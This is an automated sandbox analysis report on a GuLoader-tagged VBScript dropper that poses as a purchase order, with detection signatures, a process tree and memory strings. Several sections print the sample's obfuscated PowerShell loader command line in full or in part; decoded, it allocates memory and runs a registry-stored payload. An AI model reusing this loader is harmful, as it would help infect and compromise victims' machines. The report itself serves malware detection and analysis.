Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PO-09784893 xlsx.vbs

Overview

General Information

Sample Name:PO-09784893 xlsx.vbs
Analysis ID:755440
MD5:bfa859d9ad7b23d3606ea13f525065a7
SHA1:a1b3e395dc20bcdaa866b953a08a48d0079bace2
SHA256:ec51e9ad23c469e82059bd497873749017e80e136053a25c7a752ffa18bf2002
Tags:GuLoadervbs
Infos:

Detection

Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Sigma detected: Dot net compiler compiles file from suspicious location
VBScript performs obfuscated calls to suspicious functions
Potential evasive VBS script found (use of timer() function in loop)
Obfuscated command line found
Wscript starts Powershell (via cmd or directly)
Potential malicious VBS script found (suspicious strings)
Very long command line found
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Java / VBScript file with very long strings (likely obfuscated code)
Drops PE files
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Detected potential crypto function
Compiles C# or VB.Net code
Found dropped PE file which has not been started or loaded
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Contains long sleeps (>= 3 min)
Abnormal high CPU Usage
Enables debug privileges

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 4180 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO-09784893 xlsx.vbs" MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
    • cmd.exe (PID: 5132 cmdline: CMD.EXE /c echo C:\Windows MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      • conhost.exe (PID: 2860 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 4412 cmdline: C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Saudiarabiske = """KoAEldMedPo-CeTphySupLnePh Eg-FrTFoyCepspeGrDTeefafSaiRenSpiPltSeiUfoSlnRa Je'DruBlsLiiMinIngAx AjSmoyTesZatIneNemUg;SpuLesUniSonUngMu TrSPoyelsIntHaeKomTr.SvRKiuHenHatEgiSimKaeSh.MoICanPitOxeterStoFepTeSAreEfrSkvFoishcGaeBesFo;FopKouBabSelStihocLv MasAftTraRutSeiBecad MecVelSaaXysAusBr OsTSehLiwBuaKorHutAbnBeeBesBusUn1Ce Sa{Tr[MaDAnlOmlSpIVemArpSuoSerUttFr(St`"""PeAUnDOoVEdAStPunIFo3Nd2La.cuDGeLruLCi`"""Cl)Bl]BrpasuVibBolIsiudcWa UnsBetSuaImtAfiFucBi HaeSlxTotboeTjrSunKt reiVinSotTu SpGReeAftUdSoveLarUdvCoiVacTieSkKSteSayCiNInaWempreTa(NoiNongrtCo OmNAnoTayMoiCasPllMa,GriApnIntAl AlSSelLagSptSm6Pe9Fo,BiiUrnBetPi KrAIsfFifLiainlPo,maiBenMotTr AsbTeaGagLaaNy)Ma;Sc[SoDChlDelNgIGomMiptioVarkutPa(Sa`"""SkgWhdBoiSe3Vi2Pe`"""Sn)Ka]BepKruRabKllIbiFecSl FosBetAdaArtGriHvcEm DreHaxSatSeeAsrBrnDa AaiafnLotOv BeGNaeSotHjCamlRgiBupSaRmagConRe(SkiBanRatHe KoMEkuTalLa,StiaunCetEt TrGMagpyeUngAnuFi)Wo;Ub[UbDCalExlStIRomCipReoCarDytTr(Se`"""cakDieSarSenPleMalbi3Tr2si`"""Tr)Be]JopBruYabSolAuiLacDi DisLjtSkaEmtTuiOvcBe AterexSttDreAtrFonWe FlIUnnpatTaPsttVerAr SaEpinLsuMemUnSHayAbsDotaseTumSpLDroAdcVoaSllSteDksBaWSa(RauSviOpnAltko MevPe1du,MoiUnnHeter PlvSn2Ta)Du;He[CaDFolGylRaIEcmArpAnoBrrQutFe(Li`"""SykBaeskravnKaeMilSk3Mo2de`"""Di)Fa]PrpCouBebAnlAfiHycUn AlsHjtHyaDrtMiiUncPi CeeStxKytKaeAlrKonac ariBlnCatse HuGSilPsoSebEfaPllEmDMaeSalHeeSatBreprASmtGuoFimUn(PuiAenFotDr TePTrrtleDe1To5Sa1Co)Sk;ha[BaDEvlEulTrIDemHopSaoFarNotTr(Ca`"""AkgPidPliFi3Sc2Re`"""Aa)Da]SapEkuApbTalReiHacPr NosoptSraSktStiSqcAk EneAaxSptFoeTarDenSp AriSenOvtBe FlSFotEnrunoAekSheBoABlnTadPaFGeiSolAnlblPOsaAvtunhPr(DiiDdnArtKl AcEKrtLuhWiyUnlHj8Bl7Du)Bi;Qu[NoDKrlUnlEkIApmEmpSyoinrGltCy(Sa`"""seuMosPeeafrPa3Bl2In`"""Ko)Un]JrpdiuRebSklNoiSncSc SpsFutstaSetFaiklcMe UeeDexUdtCoeUnrJanSt iniNonFltRh GrCInlSkoInsBiePyCDalSuiMopEtbEnoTaaTarBedPa(Ku)Un;Yn[ChDAglLrlOtICamCopSaoGhrmatBa(Sp`"""PawTriArnResGapDeoAnoSplTi.BrdExrObvSp`"""Un)Dr]OppHeuInbUnlCeiCocSt UnsSetCeaFotDiistcMe StePaxwatlaeBrrRenOv PaiStnCotRu PlSEncLuhTeeNodTrutalDaedrJMaoPrbTr(BeitynOltkl KnUFanAfoKovCoeStrEl2Br2Kl6Re,IniNonRetKo PiaMikWetStiWa)Mu;Dd[AfDUnlSllspIVomRepNooTrrChtOl(Cy`"""GeAAnDPrVEgALiPSeIFo3Sp2Re.RyDOvLAjLRe`"""Do)St]TypNauRabMelPoilocBu PlsFitMiapatSciPecTa DieStxBotDreHurmenAl MliFanBltCi TrQMouFaeErrAryVoSHaeKorKrvTsiLecKueFaCudoAfnPrfliiSugHe(MuiFonpitHo prRTheEngoflEseatrFi,LiiInnGrtFu opCEnogasAc0Ti,BaiMinSttSh GrDDriSpsDepreoOvsSu,CoiRinTatIn NoNPeaRupUnhLeoEr2Ho7No)Mo;Un[InDHalaflUvIAfmCoppaosprUntTo(Co`"""IrwaliSknMisOvpPeoNooAalRe.SldMorKlvFo`"""St)Se]CopFouCrbBilOpiSkcSk KasOvtBlaantFriOmcMa UneSuxEntTreLyrDenBe VeiFonRitCa haDCioUncGruRemDreMunWetSePFirSloLipPaeVkrPutIniTeeEnsVe(BoiAanLitWo WiFUvoTarBesat,FoiVenNitsa GrLSuaNonUsgSorBeeSi,FoiYunMitOu StSObkRerHeisevTv,FriGanTetTo BuhGheKamEx,waiAlnAntAn MeSSeaRhmErbDuaGrfTu,SeiSlnuntEx MoRReesitSpiau)Fr;Dr[WhDamlRelkuITamBlpLdoChrLutBa(An`"""SegAddFriFr3af2Tr`"""No)Ga]GlpFruFobSclIriLecDo UmscatOuaNytCeiStcfo DieTjxbltMoefurkinSc FliBlnSttSi DoPmatKrVFuiImsSuiNobHelSaeAf(PeiBrnSktSt BjSsnaKutAf,PaiCynIntRo ciAPssPspKoafa,LsiSenbatsl JePRerTajSesTiiUnsTg)su;Ny[HuDSalGalTjIOlmSepAropirRetLe(Vi`"""DeuLesAfeSmrFo3Bu2An`"""pa)Sw]SkpAcuDibinlKriNrcBl TasUntBiaPotAniIncCh CoeFrxPltLoeUnrPenTo HyiTunprtMa jaGPreFotBuMSkeSpsNssBeaMagAieTi(PoiinnautSl TyGTuiChrDi,TriLanHotSt AmSSitTorDoaFa,SkibanRetin PrkBeiInpPrkRoaLalBo,AdiAnnAntGe UlFBeiRerNr)So;Kh[InDHolRilRkIGumrepfloGarIstLa(Pa`"""PekEseSkrArnSaeChlMe3An2ti`"""Ji)Ca]SapCeuCabAflReiTocUn PesCltLiaSetOciDacCh KoeAlxUntPreDerNinCi DiiFonPltFl DuVPoiSarFotHeuOgaThlFeAUnlMolSeoDicRe(TrisknSytDo SevNe1Ko,KaiBanBetNi PrvKn2Bi,HeiBanAmtMo InvSt3Bu,CoiMunMitTr Sivti4To)Tr;Bl[MaDinlDelJuISvmMepKboMirRitVi(Gr`"""DiAToDboVToAMaPMiIHa3Hv2Ho.BrDDeLKaLUn`"""Ru)Am]RgpKauTybVilDaiUncCh TosNetUnaMetUniBrcSe SeeNexEntIneDarBinQu AriStnSttOp RaRDoeTrgLiLOvopsaDadOpKHoeFryFr(SiiPhnSatIn syDZaaHocUnrImyBa,FaiUnnaltFo SpSSatHaoUnrPr,TiiHinPutBu NoONanEscfi)He;Po[noDCelHalBlIStmUnpUnoDarArtGi(Ge`"""SpgundSliMo3Sp2Pa`"""Em)Ti]AlpDiuFabTrlLiiChcGe PosKotHoaCetFliStcSe TreLsxRetAceUrrConBa FoiInnMitTr DdWAeiGedKaePrnfiPTjaSttBlhVe(StiHanTutIs TeOGabBydBauTr)St;Ra}Fj'Al;Bj`$DdTPohPawPlaRerFrtFrnvieVisDesSh3Gu=Fr[UdTPshRewKaaOnrSetPjnTreScsWosAr1Ov]Ca:Kn:frVMaiVirSetheuHoaVelStANulArlFooNocSu(So0Nu,Re1Mi0Cl4Ha8Mi5Pr7Ka6Mo,Un1Un2Fr2Br8Ce8Sm,pe6Tr4po)jo;Se`$ReNWiaCreFggLaaAntTaePu=Mi(NoGBleMntBu-ScIPatCieNemAuPDyrFooKupSleKurTrtInyKa Tv-haPBaaExtLohLi Ch'GyHFiKSuCSeUEn:Fr\InTVorMuekaeUotPsiSksIneFu\SkFAneDijStlErtCaoCalHvkBlnPoiPrnNegCheBanovsMu1Ef6Fo0Ka'Ha)Ci.TiHBaeSulViafofSotBoeHonElsSlfMoiKolLomSyeLnnResBr;Ft`$FoVToiJalKrlfeiPagPesRetAreKnsSy Ne=Tv Rl[VoSCyyKnsadtLeeAdmSk.OuCAdoUnnHevnoeFirNotSi]Ov:Ac:RaFMurZeoKmmevBBeaNysMueRe6Un4MoSSltRerStiUnnCogKl(Ga`$StNChaGeePrgAuaLotObeFa)Me;Kv[SoSGryBesMatEmeSmmFe.crRInuGrnLetRiiStmdeeIm.KaIFrnAjtFleOprcroBepPrSGaeGrrSnvIniGncOveHosFa.HaMInaVerGosFrhAnaAllBl]Fr:El:WaCVaoVapCoyir(Un`$HiVTriSilSwlShiSagCosartFreSlsCa,Br ca0Gs,Ru Be Cr`$HeTRehBewBiaWorFltUnnOveUnsHysVa3Ug,By Zy`$BiVSpiSalGrlKoiSvgKrsLitUdeDrsAd.HecMioPouAjnCttHa)Ov;Me[HyTBuhPrwFyausrAntBenMaeMospasHo1In]Je:Sa:HoEtrnBiuPimFrSBrycesditBeeKamUdLAeoDrcKoaGelOpeLesGeWVi(Bo`$feTSahSkwJoaEnrCitPrnPeeSasTossi3Bi,be Kr0De)rh#Te;""";Function Thwartness4 { param([String]$HS); For($i=2; $i -lt $HS.Length-1; $i+=(2+1)){ $Sallowy = $Sallowy + $HS.Substring($i, 1); } $Sallowy;}$Fictioneer0 = Thwartness4 'UdIReEDiXSk ';$Fictioneer1= Thwartness4 $Saudiarabiske;&$Fictioneer0 $Fictioneer1;; MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 2816 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 1960 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ksa1shoc\ksa1shoc.cmdline MD5: 350C52F71BDED7B99668585C15D70EEA)
        • cvtres.exe (PID: 1492 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES41DE.tmp" "c:\Users\user\AppData\Local\Temp\ksa1shoc\CSC45555F46326F41418DCB1F5062A9163A.TMP" MD5: C09985AE74F0882F208D75DE27770DFA)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
PO-09784893 xlsx.vbsWScript_Shell_PowerShell_ComboDetects malware from Middle Eastern campaign reported by TalosFlorian Roth
  • 0xa39:$s1: .CreateObject("WScript.Shell")
  • 0x3fe57:$p1: powershell.exe
  • 0x4d288:$p1: powershell.exe

Memory Dumps

SourceRuleDescriptionAuthorStrings
Process Memory Space: powershell.exe PID: 4412INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0x7addd:$b2: ::FromBase64String(
  • 0x11cd57:$b2: ::FromBase64String(
  • 0x240963:$b2: ::FromBase64String(
  • 0x8cb9a:$s1: -join
  • 0x99c6f:$s1: -join
  • 0x9d041:$s1: -join
  • 0x9d6f3:$s1: -join
  • 0x9f1e4:$s1: -join
  • 0xa13ea:$s1: -join
  • 0xa1c11:$s1: -join
  • 0xa2481:$s1: -join
  • 0xa2bbc:$s1: -join
  • 0xa2bee:$s1: -join
  • 0xa2c36:$s1: -join
  • 0xa2c55:$s1: -join
  • 0xa34a5:$s1: -join
  • 0xa3621:$s1: -join
  • 0xa3699:$s1: -join
  • 0xa372c:$s1: -join
  • 0xa3992:$s1: -join
  • 0xa5b28:$s1: -join

Other

SourceRuleDescriptionAuthorStrings
amsi64_4180.amsi.csvWScript_Shell_PowerShell_ComboDetects malware from Middle Eastern campaign reported by TalosFlorian Roth
  • 0x1a:$s1: .CreateObject("WScript.Shell")
  • 0x72:$s1: .CreateObject("WScript.Shell")
  • 0x1e5:$p1: powershell.exe

Sigma Signatures

Data Obfuscation

barindex
Sigma detected: Dot net compiler compiles file from suspicious location
Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ksa1shoc\ksa1shoc.cmdline, CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ksa1shoc\ksa1shoc.cmdline, CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Saudiarabiske = """KoAEldMedPo-CeTphySupLnePh Eg-FrTFoyCepspeGrDTeefafSaiRenSpiPltSeiUfoSlnRa Je'DruBlsLiiMinIngAx AjSmoyTesZatIneNemUg;SpuLesUniSonUngMu TrSPoyelsIntHaeKomTr.SvRKiuHenHatEgiSimKaeSh.MoICanPitOxeterStoFepTeSAreEfrSkvFoishcGaeBesFo;FopKouBabSelStihocLv MasAftTraRutSeiBecad MecVelSaaXysAusBr OsTSehLiwBuaKorHutAbnBeeBesBusUn1Ce Sa{Tr[MaDAnlOmlSpIVemArpSuoSerUttFr(St`"""PeAUnDOoVEdAStPunIFo3Nd2La.cuDGeLruLCi`"""Cl)Bl]BrpasuVibBolIsiudcWa UnsBetSuaImtAfiFucBi HaeSlxTotboeTjrSunKt reiVinSotTu SpGReeAftUdSoveLarUdvCoiVacTieSkKSteSayCiNInaWempreTa(NoiNongrtCo OmNAnoTayMoiCasPllMa,GriApnIntAl AlSSelLagSptSm6Pe9Fo,BiiUrnBetPi KrAIsfFifLiainlPo,maiBenMotTr AsbTeaGagLaaNy)Ma;Sc[SoDChlDelNgIGomMiptioVarkutPa(Sa`"""SkgWhdBoiSe3Vi2Pe`"""Sn)Ka]BepKruRabKllIbiFecSl FosBetAdaArtGriHvcEm DreHaxSatSeeAsrBrnDa AaiafnLotOv BeGNaeSotHjCamlRgiBupSaRmagConRe(SkiBanRatHe KoMEkuTalLa,StiaunCetEt TrGMagpyeUngAnuFi)Wo;Ub[UbDCalExlStIRomCipReoCarDytTr(Se`"""cakDieSarSenPleMalbi3Tr2si`"""Tr)Be]JopBruYabSolAuiLacDi DisLjtSkaEmtTuiOvcBe AterexSttDreAtrFonWe FlIUnnpatTaPsttVerAr SaEpinLsuMemUnSHayAbsDotaseTumSpLDroAdcVoaSllSteDksBaWSa(RauSviOpnAltko MevPe1du,MoiUnnHeter PlvSn2Ta)Du;He[CaDFolGylRaIEcmArpAnoBrrQutFe(Li`"""SykBaeskravnKaeMilSk3Mo2de`"""Di)Fa]PrpCouBebAnlAfiHycUn AlsHjtHyaDrtMiiUncPi CeeStxKytKaeAlrKonac ariBlnCatse HuGSilPsoSebEfaPllEmDMaeSalHeeSatBreprASmtGuoFimUn(PuiAenFotDr TePTrrtleDe1To5Sa1Co)Sk;ha[BaDEvlEulTrIDemHopSaoFarNotTr(Ca`"""AkgPidPliFi3Sc2Re`"""Aa)Da]SapEkuApbTalReiHacPr NosoptSraSktStiSqcAk EneAaxSptFoeTarDenSp AriSenOvtBe FlSFotEnrunoAekSheBoABlnTadPaFGeiSolAnlblPOsaAvtunhPr(DiiDdnArtKl AcEKrtLuhWiyUnlHj8Bl7Du)Bi;Qu[NoDKrlUnlEkIApmEmpSyoinrGltCy(Sa`"""seuMosPeeafrPa3Bl2In`"""Ko)Un]JrpdiuRebSklNoiSncSc SpsFutstaSetFaiklcMe UeeDexUdtCoeUnrJanSt iniNonFltRh GrCInlSkoInsBiePyCDalSuiMopEtbEnoTaaTarBedPa(Ku)Un;Yn[ChDAglLrlOtICamCopSaoGhrmatBa(Sp`"""PawTriArnResGapDeoAnoSplTi.BrdExrObvSp`"""Un)Dr]OppHeuInbUnlCeiCocSt UnsSetCeaFotDiistcMe StePaxwatlaeBrrRenOv PaiStnCotRu PlSEncLuhTeeNodTrutalDaedrJMaoPrbTr(BeitynOltkl KnUFanAfoKovCoeStrEl2Br2Kl6Re,IniNonRetKo PiaMikWetStiWa)Mu;Dd[AfDUnlSllspIVomRepNooTrrChtOl(Cy`"""GeAAnDPrVEgALiPSeIFo3Sp2Re.RyDOvLAjLRe`"""Do)St]TypNauRabMelPoilocBu PlsFitMiapatSciPecTa DieStxBotDreHurmenAl MliFanBltCi TrQMouFaeErrAryVoSHaeKorKrvTsiLecKueFaCudoAfnPrfliiSugHe(MuiFonpitHo prRTheEngoflE

Snort Signatures

No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results
Source: Binary string: ek8C:\Users\user\AppData\Local\Temp\ksa1shoc\ksa1shoc.pdb source: powershell.exe, 00000003.00000002.848043775.0000000004E2A000.00000004.00000800.00020000.00000000.sdmp
Source: powershell.exe, 00000003.00000002.836596796.0000000002CE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000003.00000002.861091835.0000000007940000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft.co
Source: powershell.exe, 00000003.00000002.852449192.0000000005850000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000003.00000002.840675760.0000000004931000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000003.00000002.838609935.00000000047F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000003.00000002.840675760.0000000004931000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000003.00000002.852449192.0000000005850000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000003.00000002.852449192.0000000005850000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000003.00000002.852449192.0000000005850000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000003.00000002.840675760.0000000004931000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000003.00000002.852449192.0000000005850000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe

System Summary

barindex
Malicious sample detected (through community Yara rule)
Source: Process Memory Space: powershell.exe PID: 4412, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Wscript starts Powershell (via cmd or directly)
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe CMD.EXE /c echo C:\Windows
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Saudiarabiske = """KoAEldMedPo-CeTphySupLnePh Eg-FrTFoyCepspeGrDTeefafSaiRenSpiPltSeiUfoSlnRa Je'DruBlsLiiMinIngAx AjSmoyTesZatIneNemUg;SpuLesUniSonUngMu TrSPoyelsIntHaeKomTr.SvRKiuHenHatEgiSimKaeSh.MoICanPitOxeterStoFepTeSAreEfrSkvFoishcGaeBesFo;FopKouBabSelStihocLv MasAftTraRutSeiBecad MecVelSaaXysAusBr OsTSehLiwBuaKorHutAbnBeeBesBusUn1Ce Sa{Tr[MaDAnlOmlSpIVemArpSuoSerUttFr(St`"""PeAUnDOoVEdAStPunIFo3Nd2La.cuDGeLruLCi`"""Cl)Bl]BrpasuVibBolIsiudcWa UnsBetSuaImtAfiFucBi HaeSlxTotboeTjrSunKt reiVinSotTu SpGReeAftUdSoveLarUdvCoiVacTieSkKSteSayCiNInaWempreTa(NoiNongrtCo OmNAnoTayMoiCasPllMa,GriApnIntAl AlSSelLagSptSm6Pe9Fo,BiiUrnBetPi KrAIsfFifLiainlPo,maiBenMotTr AsbTeaGagLaaNy)Ma;Sc[SoDChlDelNgIGomMiptioVarkutPa(Sa`"""SkgWhdBoiSe3Vi2Pe`"""Sn)Ka]BepKruRabKllIbiFecSl FosBetAdaArtGriHvcEm DreHaxSatSeeAsrBrnDa AaiafnLotOv BeGNaeSotHjCamlRgiBupSaRmagConRe(SkiBanRatHe KoMEkuTalLa,StiaunCetEt TrGMagpyeUngAnuFi)Wo;Ub[UbDCalExlStIRomCipReoCarDytTr(Se`"""cakDieSarSenPleMalbi3Tr2si`"""Tr)Be]JopBruYabSolAuiLacDi DisLjtSkaEmtTuiOvcBe AterexSttDreAtrFonWe FlIUnnpatTaPsttVerAr SaEpinLsuMemUnSHayAbsDotaseTumSpLDroAdcVoaSllSteDksBaWSa(RauSviOpnAltko MevPe1du,MoiUnnHeter PlvSn2Ta)Du;He[CaDFolGylRaIEcmArpAnoBrrQutFe(Li`"""SykBaeskravnKaeMilSk3Mo2de`"""Di)Fa]PrpCouBebAnlAfiHycUn AlsHjtHyaDrtMiiUncPi CeeStxKytKaeAlrKonac ariBlnCatse HuGSilPsoSebEfaPllEmDMaeSalHeeSatBreprASmtGuoFimUn(PuiAenFotDr TePTrrtleDe1To5Sa1Co)Sk;ha[BaDEvlEulTrIDemHopSaoFarNotTr(Ca`"""AkgPidPliFi3Sc2Re`"""Aa)Da]SapEkuApbTalReiHacPr NosoptSraSktStiSqcAk EneAaxSptFoeTarDenSp AriSenOvtBe FlSFotEnrunoAekSheBoABlnTadPaFGeiSolAnlblPOsaAvtunhPr(DiiDdnArtKl AcEKrtLuhWiyUnlHj8Bl7Du)Bi;Qu[NoDKrlUnlEkIApmEmpSyoinrGltCy(Sa`"""seuMosPeeafrPa3Bl2In`"""Ko)Un]JrpdiuRebSklNoiSncSc SpsFutstaSetFaiklcMe UeeDexUdtCoeUnrJanSt iniNonFltRh GrCInlSkoInsBiePyCDalSuiMopEtbEnoTaaTarBedPa(Ku)Un;Yn[ChDAglLrlOtICamCopSaoGhrmatBa(Sp`"""PawTriArnResGapDeoAnoSplTi.BrdExrObvSp`"""Un)Dr]OppHeuInbUnlCeiCocSt UnsSetCeaFotDiistcMe StePaxwatlaeBrrRenOv PaiStnCotRu PlSEncLuhTeeNodTrutalDaedrJMaoPrbTr(BeitynOltkl KnUFanAfoKovCoeStrEl2Br2Kl6Re,IniNonRetKo PiaMikWetStiWa)Mu;Dd[AfDUnlSllspIVomRepNooTrrChtOl(Cy`"""GeAAnDPrVEgALiPSeIFo3Sp2Re.RyDOvLAjLRe`"""Do)St]TypNauRabMelPoilocBu PlsFitMiapatSciPecTa DieStxBotDreHurmenAl MliFanBltCi TrQMouFaeErrAryVoSHaeKorKrvTsiLecKueFaCudoAfnPrfliiSugHe(MuiFonpitHo prRTheEngoflEseatrFi,LiiInnGrtFu opCEnogasAc0Ti,BaiMinSttSh GrDDriSpsDepreoOvsSu,CoiRinTatIn NoNPeaRupUnhLeoEr2Ho7No)Mo;Un[InDHalaflUvIAfmCoppaosprUntTo(Co`"""IrwaliSknMisOvpPeoNooAalRe.SldMorKlvFo`"""St)Se]CopFouCrbBilOpiSkcSk KasOvtBlaantFriOmcMa UneSuxEntTreLyrDenBe VeiFonRitCa haDCioUncGruRemDreMunWetSePFirSloLipPaeVkrPutIniTeeEnsVe(BoiAanLitWo WiFUvoTarBesat,FoiVenNitsa GrLSuaNonUsgSorBeeSi,FoiYunMitOu StSObkRerHeisevTv,FriGanTetTo BuhGheKamEx,waiAlnAntAn MeSSeaRhmErbDuaGrfTu,SeiSlnuntEx MoRReesitSpiau)Fr;Dr[WhDamlRelku
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe CMD.EXE /c echo C:\WindowsJump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Saudiarabiske = """KoAEldMedPo-CeTphySupLnePh Eg-FrTFoyCepspeGrDTeefafSaiRenSpiPltSeiUfoSlnRa Je'DruBlsLiiMinIngAx AjSmoyTesZatIneNemUg;SpuLesUniSonUngMu TrSPoyelsIntHaeKomTr.SvRKiuHenHatEgiSimKaeSh.MoICanPitOxeterStoFepTeSAreEfrSkvFoishcGaeBesFo;FopKouBabSelStihocLv MasAftTraRutSeiBecad MecVelSaaXysAusBr OsTSehLiwBuaKorHutAbnBeeBesBusUn1Ce Sa{Tr[MaDAnlOmlSpIVemArpSuoSerUttFr(St`"""PeAUnDOoVEdAStPunIFo3Nd2La.cuDGeLruLCi`"""Cl)Bl]BrpasuVibBolIsiudcWa UnsBetSuaImtAfiFucBi HaeSlxTotboeTjrSunKt reiVinSotTu SpGReeAftUdSoveLarUdvCoiVacTieSkKSteSayCiNInaWempreTa(NoiNongrtCo OmNAnoTayMoiCasPllMa,GriApnIntAl AlSSelLagSptSm6Pe9Fo,BiiUrnBetPi KrAIsfFifLiainlPo,maiBenMotTr AsbTeaGagLaaNy)Ma;Sc[SoDChlDelNgIGomMiptioVarkutPa(Sa`"""SkgWhdBoiSe3Vi2Pe`"""Sn)Ka]BepKruRabKllIbiFecSl FosBetAdaArtGriHvcEm DreHaxSatSeeAsrBrnDa AaiafnLotOv BeGNaeSotHjCamlRgiBupSaRmagConRe(SkiBanRatHe KoMEkuTalLa,StiaunCetEt TrGMagpyeUngAnuFi)Wo;Ub[UbDCalExlStIRomCipReoCarDytTr(Se`"""cakDieSarSenPleMalbi3Tr2si`"""Tr)Be]JopBruYabSolAuiLacDi DisLjtSkaEmtTuiOvcBe AterexSttDreAtrFonWe FlIUnnpatTaPsttVerAr SaEpinLsuMemUnSHayAbsDotaseTumSpLDroAdcVoaSllSteDksBaWSa(RauSviOpnAltko MevPe1du,MoiUnnHeter PlvSn2Ta)Du;He[CaDFolGylRaIEcmArpAnoBrrQutFe(Li`"""SykBaeskravnKaeMilSk3Mo2de`"""Di)Fa]PrpCouBebAnlAfiHycUn AlsHjtHyaDrtMiiUncPi CeeStxKytKaeAlrKonac ariBlnCatse HuGSilPsoSebEfaPllEmDMaeSalHeeSatBreprASmtGuoFimUn(PuiAenFotDr TePTrrtleDe1To5Sa1Co)Sk;ha[BaDEvlEulTrIDemHopSaoFarNotTr(Ca`"""AkgPidPliFi3Sc2Re`"""Aa)Da]SapEkuApbTalReiHacPr NosoptSraSktStiSqcAk EneAaxSptFoeTarDenSp AriSenOvtBe FlSFotEnrunoAekSheBoABlnTadPaFGeiSolAnlblPOsaAvtunhPr(DiiDdnArtKl AcEKrtLuhWiyUnlHj8Bl7Du)Bi;Qu[NoDKrlUnlEkIApmEmpSyoinrGltCy(Sa`"""seuMosPeeafrPa3Bl2In`"""Ko)Un]JrpdiuRebSklNoiSncSc SpsFutstaSetFaiklcMe UeeDexUdtCoeUnrJanSt iniNonFltRh GrCInlSkoInsBiePyCDalSuiMopEtbEnoTaaTarBedPa(Ku)Un;Yn[ChDAglLrlOtICamCopSaoGhrmatBa(Sp`"""PawTriArnResGapDeoAnoSplTi.BrdExrObvSp`"""Un)Dr]OppHeuInbUnlCeiCocSt UnsSetCeaFotDiistcMe StePaxwatlaeBrrRenOv PaiStnCotRu PlSEncLuhTeeNodTrutalDaedrJMaoPrbTr(BeitynOltkl KnUFanAfoKovCoeStrEl2Br2Kl6Re,IniNonRetKo PiaMikWetStiWa)Mu;Dd[AfDUnlSllspIVomRepNooTrrChtOl(Cy`"""GeAAnDPrVEgALiPSeIFo3Sp2Re.RyDOvLAjLRe`"""Do)St]TypNauRabMelPoilocBu PlsFitMiapatSciPecTa DieStxBotDreHurmenAl MliFanBltCi TrQMouFaeErrAryVoSHaeKorKrvTsiLecKueFaCudoAfnPrfliiSugHe(MuiFonpitHo prRTheEngoflEseatrFi,LiiInnGrtFu 